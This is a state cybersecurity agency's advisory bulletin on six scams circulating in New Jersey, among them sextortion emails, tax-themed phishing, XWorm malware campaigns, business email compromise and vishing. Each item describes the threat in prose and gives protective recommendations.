6 events in Passaic County with a date

New Jersey Cybersecurity & Combination Integration cell

By: NJCCIC

1.

Sextortion Scams Are Back
Image Source: KrebsOnSecurity
The NJCCIC received incident reports indicating that a new version of the well-known sextortion email scam is currently circulating. This version now includes a photo of the recipient's home, likely found via online mapping applications. The targeted individual's home address could have been easily obtained in public data records or through compromised personal information resulting from data breaches. This fraudulent scheme claims that the Pegasus spyware was installed on the target’s device and secretly recorded webcam footage of recipients engaging in intimate activities. The targeted individual is then threatened with the release of compromising or sexually explicit photos or videos to contacts and their social media platforms if a Bitcoin payment ranging from $500 to $2,500 is not made. The email states that the targeted individual has 24 hours to pay by scanning the included QR code. The cybercriminal also claims to have embedded a specific pixel to identify when the email was read, starting the 24-hour countdown.
Recommendations
  • The NJCCIC recommends users educate themselves and others on this and similar scams to prevent future victimization.
  • There is no indication that these threats are credible; therefore, users are advised to refrain from sending funds and disregard these emails.
  • Avoid clicking links, responding to, or otherwise acting on unsolicited text messages or emails.
  • Users can search for and report the bitcoin addresses included in the scam email to the Bitcoin Abuse Database.
  • This scam can be reported to the Federal Trade Commission (FTC), the FBI's IC3 and the  NJCCIC.

2.

Tax-Related Phishing Scams Now Deliver Malware
Last week, the NJCCIC reported increased phishing attempts targeting NJ state employees by impersonating the IRS. Proofpoint analysts noted a rise in tax-themed phishing campaigns, particularly as tax deadlines approach in the US and the UK. Likewise, these campaigns were also observed targeting NJ state employees. These phishing attempts typically impersonate government or financial organizations connected to tax filing. In early January, Proofpoint identified hundreds of malicious domains linked to tax-related campaigns, many of which impersonated legitimate companies.
Email impersonating Intuit (left); credential phishing landing page (right). Image Source: Proofpoint
One campaign observed on January 16 impersonated Intuit but used a generic sender with a URL directing users to a fake authentication page to harvest credentials. This campaign delivered 40,000 emails and impacted over 2,000 organizations.
Malicious email impersonating tax software. Image Source: Proofpoint
While most tax-themed campaigns typically focus on credential phishing, some were also observed delivering malware. A separate campaign impersonated a tax software company that distributed two malware payloads via a JavaScript file hosted on Microsoft Azure, leading to the deployment of Rhadamanthys malware and zgRAT. Additionally, various unrelated campaigns impersonating tax agencies and software have been observed attempting to deliver different malware payloads, including MetaStealer, XWorm, AsyncRAT, and VenomRAT.
Recommendations
  • Beware of communications claiming to be from the IRS. The IRS does not contact individuals by phone, email, or text message to solicit information or money. Instead, the IRS sends notices and bills through postal mail.
  • Facilitate user awareness training to include these types of phishing-based techniques.
  • Avoid clicking links, opening attachments, responding to, or acting on unsolicited text messages or emails.
  • Type official website URLs into browsers manually.
  • Ensure multi-factor authentication (MFA) is enabled for all online accounts.
  • Consider leveraging behavior-based detection tools rather than signature-based tools.
  • Technical details, TTPs, and indicators of compromise (IOCs) can be found in the Proofpoint blog post.
  • Report phishing emails and other malicious cyber activity to the FTC, FBI's IC3, and the  NJCCIC.

 

3.

XWorm Malware Quickly Slithers in Multiple Campaigns
First discovered in 2022, XWorm malware is a remote access trojan (RAT) capable of evading detection and collecting sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data. XWorm tracks keystrokes, captures webcam images, listens to audio input, scans network connections, and views open windows. It can also access and manipulate a computer's clipboard, potentially stealing cryptocurrency wallet credentials. Last year, XWorm was involved in many cyberattacks, including the exploitation of CloudFlare tunnels and the delivery via a Windows script file, and the upward trend of these sophisticated RATs is already evident in 2025.
Last month, researchers discovered threat actors targeted script kiddies with a trojanized version of the XWorm RAT builder. The weaponized malware propagated through GitHub, Telegram, and file-sharing platforms to infect over 18,000 devices globally, including the United States.  The malware secretly compromised computers to deploy a backdoor to perform system reconnaissance, command execution, and data exfiltration, such as browser credentials, Discord tokens, Telegram data, and system information. Threat actors have exfiltrated over 1 GB of browser credentials from multiple computers. The malware’s “kill switch” feature was identified and leveraged to disrupt operations on infected computers.
In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware. The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.
The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. There are multiple redirects and filtering techniques before arriving at one of the numerous landing pages with various layouts and scripting. The URLs for the landing pages contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest. The threat actors use the ClickFix technique to display dialogue boxes containing fake error messages to manipulate targets to follow instructions to “fix” the problem. Sometimes, they leverage the appearance of authenticity by using a fake CAPTCHA-themed ClickFix technique to validate the target. However, the target’s clicking copies, pastes, or executes malicious payloads or scripts in the background. The payloads use PowerShell or MSHTA commands to download and execute XWorm malware.
Recommendations
  • Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders.
  • Exercise caution with communications from known senders.
  • Confirm requests from senders via contact information obtained from verified and official sources.
  • Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites.
  • Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes.
  • Reduce your digital footprint so threat actors cannot easily target you.
  • Keep systems up to date and apply patches after appropriate testing.
  • Report phishing emails and other malicious cyber activity to the FBI's IC3 and the NJCCIC.

4.

Business Email Compromise Campaign Circulating
The NJCCIC received reports of a business email compromise (BEC) campaign circulating using a compromised emergency management email account. The phishing email referenced a contract and directed the recipient to click a link to view a related document. This link led to a Linktree webpage displaying the city’s logo and instructed the user to click on another link. The landing page has since been taken down, though it intended to steal user account credentials.
In other business email compromise campaigns, threat actors intend to convince the recipient that they are a vendor and payment for goods or services is due. These emails often include a fictitious invoice and payment instructions for a fraudulent account. They may also be sent from compromised email accounts, making it difficult for recipients to question the email’s legitimacy.
Recommendations
  • Confirm the source and instructions of any monetary transaction received via email through a separate means of communication, such as a phone call. Replies to the email are not an effective verification method as they could be sent to the threat actor.
  • While an email may appear to come from a known and trusted account, that account may have been compromised. Verify all requests for the transfer of money.
  • Do not submit your credentials (username and password) to websites with URLs unassociated with an official organization or business.
  • If you act on a financial BEC scam, notify your supervisor and banking institution immediately to attempt to disrupt the transfer of funds.
  • Create a policy and procedure for identifying and reporting BEC emails, including periodic employee awareness training.
  • Establish policies and procedures that require any requests for highly sensitive information or large financial transactions to be authorized and approved by multiple individuals via a secondary means of communication beyond email.
  • Review the Don’t Be Fooled: Ways to Prevent BEC Victimization NJCCIC Informational Report for additional information.

5.

Uptick in Vishing Scams
The NJCCIC observed an uptick in vishing scams, a form of phishing over the phone. In these calls, threat actors attempt to gain trust and legitimacy by sharing some of the recipient’s personal data, such as name, age, and address. However, this data is typically an aggregated set of publicly available information found online. Some of this information may be outdated or pertain to a partner instead of the call recipient. The phone numbers used in vishing scams vary and change frequently, and threat actors often spoof official phone numbers to appear legitimate. Vishing calls may be persistent, and threat actors may contact potential victims multiple times daily.
Threat actors claim authority or legitimacy by impersonating various governmental agencies, financial institutions, organizations, and individuals to convince the call recipient to provide additional sensitive information, such as personally identifiable information (PII), financial information, or account credentials. They also convey urgency to extort money by persuading the call recipient to purchase fraudulent goods or services or grant access to their accounts or devices. The acquisition of additional information and this fraudulent activity can facilitate further cyberattacks.
In some instances, threat actors personally harass or threaten the call recipient or their known contacts. For example, a threat actor claimed the call recipient was responsible for a supposed accident and threatened them if they did not pay a hospital bill. In another example, the call recipient heard a woman crying in the background while a Spanish-speaking male claimed to be part of a cartel and demanded a $20,000 payment from the call recipient to keep the woman alive.
Additionally, a threat actor spoofed the phone number of the call recipient’s mother and demanded payment upon answering. If the call recipient did not make payment, the threat actor claimed they would kill the person they were supposedly holding at gunpoint. The call recipient heard crying in the background, disconnected the call, and contacted their mother on another line, confirming it was a scam. The call recipient’s sister also received a similar call spoofing their mother.
Furthermore, voice cloning technologies and artificial intelligence (AI) manipulations can be used in impersonation and extortion scams. Threat actors find and capture snippets of a person’s voice online, through social media platforms, in outgoing voicemail messages, or when the recipient caller answers a call. They can weaponize AI technology with the captured audio to clone a person’s voice and create fraudulent schemes, including family emergencies, kidnappings, robberies, or car accidents.
Recommendations
  • Refrain from answering unexpected calls from unknown contacts.
  • When receiving unsolicited phone calls, do not respond to any requests for sensitive information, access, or money.
  • If suspicious inquiries are made by individuals claiming to represent a trustworthy organization, hang up and call the organization back using the official phone number found on their website.
  • Establish a password with important contacts, such as loved ones, employers, and coworkers, and request it if suspicious inquiries are made by individuals claiming to represent them.
  • Report vishing scams and other malicious cyber activity to the FBI's IC3 and the NJCCIC.
  • If you or someone you know is being physically threatened, contact your local police department or dial 9-1-1 immediately.

6.

Walmart Scam Claims Purchase of PlayStation 5
A Walmart scam is circulating in which people receive voicemails claiming that a PlayStation 5 and headset purchase was made for $919.45. The scammers are attempting to lure the recipients into calling the phone number back to dispute the charge; at this point, the scammer will request personal and financial information. They may also request remote access to the recipient’s device, claiming they need the access to cancel the order or process a refund. If given access, the scammer can install malware, steal data, or use the access to extort the victim into paying a ransom demand. In some schemes, the scammer will instruct the individual to purchase gift cards as part of the refund process. LifeLock provides information on this and other Walmart scams in the article “13 Walmart Scams to Watch Out for In 2025.”
Recommendations
  • Ignore such voicemails, do not call the phone number back, and delete the voicemail message.
  • Log into your bank or credit card account directly to determine if unauthorized purchases have been made.
  • Never provide remote access to your device to an unverified individual.
  • Do not purchase gift cards as payment and never provide someone the codes on the back of a gift card.

 

Home